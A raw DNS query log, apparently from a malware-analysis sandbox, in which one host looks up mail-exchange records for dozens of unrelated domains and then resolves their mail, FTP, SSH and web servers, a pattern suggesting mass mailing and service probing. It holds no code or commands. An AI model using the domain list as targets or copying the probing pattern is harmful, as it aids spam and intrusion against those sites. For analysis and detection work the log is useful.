                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.643822908 CET192.168.2.41.1.1.10x571bStandard query (0)justdave.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.652740955 CET192.168.2.41.1.1.10xd417Standard query (0)detmar.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.671580076 CET192.168.2.41.1.1.10x8f9eStandard query (0)nakacho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.674578905 CET192.168.2.41.1.1.10xcb11Standard query (0)elteconline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.675323009 CET192.168.2.41.1.1.10x8938Standard query (0)khi-ho.ne.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.681444883 CET192.168.2.41.1.1.10xa38bStandard query (0)konic.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.683475971 CET192.168.2.41.1.1.10x175eStandard query (0)eluxviaggi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.686353922 CET192.168.2.41.1.1.10x6c73Standard query (0)ivory.plala.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.692049980 CET192.168.2.41.1.1.10xdddStandard query (0)emmetisportfun.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.696273088 CET192.168.2.41.1.1.10x3215Standard query (0)tsutomu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.697268009 CET192.168.2.41.1.1.10xe1a2Standard query (0)enp.ericsson.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.702187061 CET192.168.2.41.1.1.10x9da0Standard query (0)fermatsk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.833524942 CET192.168.2.41.1.1.10x6bfaStandard query (0)enso-center.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.863734961 CET192.168.2.41.1.1.10x347Standard query (0)magokorokan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.868558884 CET192.168.2.41.1.1.10x85b3Standard query (0)kanapy.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.870642900 CET192.168.2.41.1.1.10x4db1Standard query (0)merlynsociety.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.871110916 CET192.168.2.41.1.1.10xd476Standard query (0)ericrothphoto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.871539116 CET192.168.2.41.1.1.10x3e6bStandard query (0)keramat.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.871783018 CET192.168.2.41.1.1.10xfa73Standard query (0)erikamoveis.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.872287035 CET192.168.2.41.1.1.10x613Standard query (0)nakupusa.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.872668028 CET192.168.2.41.1.1.10xbb38Standard query (0)roland-sk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.873961926 CET192.168.2.41.1.1.10x22Standard query (0)emr.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.879137993 CET192.168.2.41.1.1.10x9ff2Standard query (0)instalanova.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.886537075 CET192.168.2.41.1.1.10x356fStandard query (0)janckulik.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.892534971 CET192.168.2.41.1.1.10x693Standard query (0)sport-tour.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.892940998 CET192.168.2.41.1.1.10xadbeStandard query (0)gryffindorhouse.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.893769026 CET192.168.2.41.1.1.10xd7aeStandard query (0)predan.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.893980980 CET192.168.2.41.1.1.10x335eStandard query (0)hokal.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.897999048 CET192.168.2.41.1.1.10x2e7cStandard query (0)animekingdom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.907654047 CET192.168.2.41.1.1.10x177eStandard query (0)brightright.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.941644907 CET192.168.2.41.1.1.10x3e7bStandard query (0)elossa.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.202502012 CET192.168.2.41.1.1.10xba15Standard query (0)kompresory-servis.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.204996109 CET192.168.2.41.1.1.10x37d0Standard query (0)elrocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.206083059 CET192.168.2.41.1.1.10x7e84Standard query (0)izberatel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.209204912 CET192.168.2.41.1.1.10x2364Standard query (0)nippondotech.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.225003004 CET192.168.2.41.1.1.10x7885Standard query (0)inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.230333090 CET192.168.2.41.1.1.10x53a1Standard query (0)oitacity.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.483829975 CET192.168.2.41.1.1.10x6d16Standard query (0)eurisproagro.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.521315098 CET192.168.2.41.1.1.10xabe0Standard query (0)mailin2.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.186413050 CET192.168.2.41.1.1.10xe65aStandard query (0)preda.plMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.186867952 CET192.168.2.41.1.1.10x9098Standard query (0)elektrospol.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.246006966 CET192.168.2.41.1.1.10x53beStandard query (0)reproma.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.265459061 CET192.168.2.41.1.1.10x94a9Standard query (0)piaggio-bratislava.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.265460014 CET192.168.2.41.1.1.10x254fStandard query (0)rotas.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266001940 CET192.168.2.41.1.1.10x11f6Standard query (0)predajpaliet.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266001940 CET192.168.2.41.1.1.10xbfaStandard query (0)mc3.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266247034 CET192.168.2.41.1.1.10x53e2Standard query (0)escolapatelli.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266344070 CET192.168.2.41.1.1.10x9061Standard query (0)sluchatka.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266707897 CET192.168.2.41.1.1.10x2c7Standard query (0)s-kotobuki-s.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.266948938 CET192.168.2.41.1.1.10xc526Standard query (0)spona-na-ponozky.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.267409086 CET192.168.2.41.1.1.10x7563Standard query (0)straznyanjel.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.268157959 CET192.168.2.41.1.1.10xa469Standard query (0)elteconline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.274350882 CET192.168.2.41.1.1.10x1f4bStandard query (0)eluxviaggi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.275979996 CET192.168.2.41.1.1.10x7728Standard query (0)ivory.plala.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.277496099 CET192.168.2.41.1.1.10xaa5dStandard query (0)emmetisportfun.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.278229952 CET192.168.2.41.1.1.10x7384Standard query (0)tsutomu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.280299902 CET192.168.2.41.1.1.10xe8c9Standard query (0)mx00.schlund.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.281013012 CET192.168.2.41.1.1.10x812cStandard query (0)zimbra.justdave.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.282165051 CET192.168.2.41.1.1.10x63b6Standard query (0)in1-smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.322953939 CET192.168.2.41.1.1.10xee3bStandard query (0)enso-center.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.325386047 CET192.168.2.41.1.1.10xc903Standard query (0)fermatsk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.360116959 CET192.168.2.41.1.1.10xfc07Standard query (0)magokorokan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.401186943 CET192.168.2.41.1.1.10xc9cdStandard query (0)merlynsociety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.401603937 CET192.168.2.41.1.1.10x2acStandard query (0)ampub04.alpha-mail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.401926041 CET192.168.2.41.1.1.10x5849Standard query (0)aquamat-liptov.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.402437925 CET192.168.2.41.1.1.10xf02eStandard query (0)kanapy.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.854721069 CET192.168.2.41.1.1.10x93c2Standard query (0)keramat.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.854721069 CET192.168.2.41.1.1.10xb537Standard query (0)ericrothphoto.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.855295897 CET192.168.2.41.1.1.10x8a6dStandard query (0)erikamoveis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.957710028 CET192.168.2.41.1.1.10xb719Standard query (0)nakupusa.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.958604097 CET192.168.2.41.1.1.10x9648Standard query (0)roland-sk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:26.801392078 CET192.168.2.41.1.1.10x6b3cStandard query (0)reproma.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.058861017 CET192.168.2.41.1.1.10xc273Standard query (0)st-comet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.063659906 CET192.168.2.41.1.1.10x6380Standard query (0)feio.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.064500093 CET192.168.2.41.1.1.10x2124Standard query (0)konic.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.064872980 CET192.168.2.41.1.1.10x2398Standard query (0)nippondotech.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.065615892 CET192.168.2.41.1.1.10xd09eStandard query (0)dobrybicykel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.065803051 CET192.168.2.41.1.1.10xaa13Standard query (0)mailin1.izberatel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.066418886 CET192.168.2.41.1.1.10x89b4Standard query (0)mx1.webhouse.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.067234993 CET192.168.2.41.1.1.10x1dd6Standard query (0)mailin1.aloeveraforever.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.067650080 CET192.168.2.41.1.1.10xe890Standard query (0)mx3.webhouse.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.069329023 CET192.168.2.41.1.1.10x8783Standard query (0)relay.exohosting.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.069922924 CET192.168.2.41.1.1.10xfdc8Standard query (0)gw1.mx.anafra.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.070297956 CET192.168.2.41.1.1.10xe2a0Standard query (0)khi-ho.ne.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.071064949 CET192.168.2.41.1.1.10x5dceStandard query (0)server1.floxm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.072981119 CET192.168.2.41.1.1.10xf829Standard query (0)email.eshopy-katalog.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.073333025 CET192.168.2.41.1.1.10x55d3Standard query (0)merlynsociety.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.073611021 CET192.168.2.41.1.1.10xfb58Standard query (0)aquamat-liptov.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.073821068 CET192.168.2.41.1.1.10x357eStandard query (0)ericrothphoto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.074619055 CET192.168.2.41.1.1.10x53b6Standard query (0)emr.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.075824976 CET192.168.2.41.1.1.10x9c87Standard query (0)instalanova.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.077363014 CET192.168.2.41.1.1.10x7bbfStandard query (0)janckulik.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.079135895 CET192.168.2.41.1.1.10xa0dbStandard query (0)sport-tour.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.079488993 CET192.168.2.41.1.1.10x9791Standard query (0)gryffindorhouse.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.080363035 CET192.168.2.41.1.1.10xcff0Standard query (0)predan.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.080624104 CET192.168.2.41.1.1.10x9973Standard query (0)hokal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.082727909 CET192.168.2.41.1.1.10xf742Standard query (0)animekingdom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.083833933 CET192.168.2.41.1.1.10xba4dStandard query (0)brightright.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.083849907 CET192.168.2.41.1.1.10x59c4Standard query (0)spona-na-ponozky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.087924957 CET192.168.2.41.1.1.10xbb5eStandard query (0)preda.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.088295937 CET192.168.2.41.1.1.10xc211Standard query (0)elektrospol.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.093595982 CET192.168.2.41.1.1.10xfa26Standard query (0)st-comet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.094736099 CET192.168.2.41.1.1.10xfc64Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.095175982 CET192.168.2.41.1.1.10x91e8Standard query (0)s-kotobuki-s.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.095508099 CET192.168.2.41.1.1.10x41aaStandard query (0)sluchatka.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.096343040 CET192.168.2.41.1.1.10x6d55Standard query (0)escolapatelli.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.096678019 CET192.168.2.41.1.1.10xe81aStandard query (0)predajpaliet.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.097132921 CET192.168.2.41.1.1.10x778eStandard query (0)rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.097651005 CET192.168.2.41.1.1.10x3a2eStandard query (0)piaggio-bratislava.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.110873938 CET192.168.2.41.1.1.10x8327Standard query (0)inmail.webglobe.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.111382008 CET192.168.2.41.1.1.10xebc7Standard query (0)mx2.mail.hostpoint.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.112482071 CET192.168.2.41.1.1.10x7ad0Standard query (0)mc3.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.118187904 CET192.168.2.41.1.1.10x65e6Standard query (0)enp.ericsson.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.118872881 CET192.168.2.41.1.1.10x7f2fStandard query (0)daxter.fsnet.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.123768091 CET192.168.2.41.1.1.10x732fStandard query (0)fosse.virtualhosting.hkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.137559891 CET192.168.2.41.1.1.10x1a5eStandard query (0)ax-sk1-mx4.ignum.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.146439075 CET192.168.2.41.1.1.10xe5afStandard query (0)mailhost01.rkd.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.149281025 CET192.168.2.41.1.1.10xaebcStandard query (0)mx.elteconline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.151067972 CET192.168.2.41.1.1.10x5f17Standard query (0)mx.a.locaweb.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.152388096 CET192.168.2.41.1.1.10xe4efStandard query (0)mx2.hostcreators.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.153683901 CET192.168.2.41.1.1.10x431dStandard query (0)mail.emr.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.154222965 CET192.168.2.41.1.1.10xe72dStandard query (0)mailin1.kanapy.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.155054092 CET192.168.2.41.1.1.10x5cf7Standard query (0)clickbkk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.155410051 CET192.168.2.41.1.1.10x9b3cStandard query (0)gabio.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.157749891 CET192.168.2.41.1.1.10xb327Standard query (0)mx.emmetisportfun.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.158463955 CET192.168.2.41.1.1.10xabafStandard query (0)mxi.alpha-prm.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.159148932 CET192.168.2.41.1.1.10xae1cStandard query (0)mx.predan.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.282299995 CET192.168.2.41.1.1.10xad49Standard query (0)mail.cesys.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.722357035 CET192.168.2.41.1.1.10xbabaStandard query (0)ftp.detmar.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.734538078 CET192.168.2.41.1.1.10x27d7Standard query (0)ssh.aloeveraforever.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.735373974 CET192.168.2.41.1.1.10xf972Standard query (0)ssh.abatek.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.736496925 CET192.168.2.41.1.1.10x57a8Standard query (0)ssh.e-art-studio.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.736670971 CET192.168.2.41.1.1.10x69f3Standard query (0)ftp.e-art-studio.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.737082005 CET192.168.2.41.1.1.10x357cStandard query (0)ftp.aexoden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.737381935 CET192.168.2.41.1.1.10x7fe4Standard query (0)ssh.detmar.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.920882940 CET192.168.2.41.1.1.10x87f8Standard query (0)ssh.justdave.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.921180010 CET192.168.2.41.1.1.10x4fStandard query (0)ftp.abatek.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.417314053 CET192.168.2.41.1.1.10xfc64Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.437957048 CET192.168.2.41.1.1.10x7bc0Standard query (0)www.kompresory-servis.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.088316917 CET192.168.2.41.1.1.10x7c6cStandard query (0)www.detmar.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.090727091 CET192.168.2.41.1.1.10x8c7eStandard query (0)aquamat-liptov.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.091212034 CET192.168.2.41.1.1.10x2b16Standard query (0)merlynsociety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.129429102 CET192.168.2.41.1.1.10x2d15Standard query (0)eluxviaggi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.184027910 CET192.168.2.41.1.1.10x50a8Standard query (0)rotas-sk.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.215866089 CET192.168.2.41.1.1.10x98b2Standard query (0)ftp.eshopy-katalog.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.220025063 CET192.168.2.41.1.1.10xeab6Standard query (0)mail.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.222054005 CET192.168.2.41.1.1.10xbafcStandard query (0)mailgate.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.330501080 CET192.168.2.41.1.1.10x27c1Standard query (0)mail.s-kotobuki-s.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.654422045 CET192.168.2.41.1.1.10xfc64Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.654941082 CET192.168.2.41.1.1.10x665Standard query (0)mail.escolapatelli.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.655517101 CET192.168.2.41.1.1.10xc376Standard query (0)mail.straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.655843973 CET192.168.2.41.1.1.10xa271Standard query (0)ftp.kompresory-servis.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.659395933 CET192.168.2.41.1.1.10x2f76Standard query (0)mailin1.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.049285889 CET192.168.2.41.1.1.10x9cd4Standard query (0)mail.st-comet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.327239990 CET192.168.2.41.1.1.10xe986Standard query (0)profisign-sk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.435205936 CET192.168.2.41.1.1.10xcd82Standard query (0)www.emmetisportfun.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.441344023 CET192.168.2.41.1.1.10x835bStandard query (0)www.hugedomains.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.441344023 CET192.168.2.41.1.1.10x5fadStandard query (0)www.oitacity.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.441660881 CET192.168.2.41.1.1.10x19e8Standard query (0)ftp.justdave.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.700700998 CET192.168.2.41.1.1.10xc376Standard query (0)mail.straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.970088005 CET192.168.2.41.1.1.10x500bStandard query (0)www.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.113270998 CET192.168.2.41.1.1.10x686eStandard query (0)www.predan.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.114161968 CET192.168.2.41.1.1.10xd918Standard query (0)www.elektrospol.skA (IP address)IN (0x0001)false
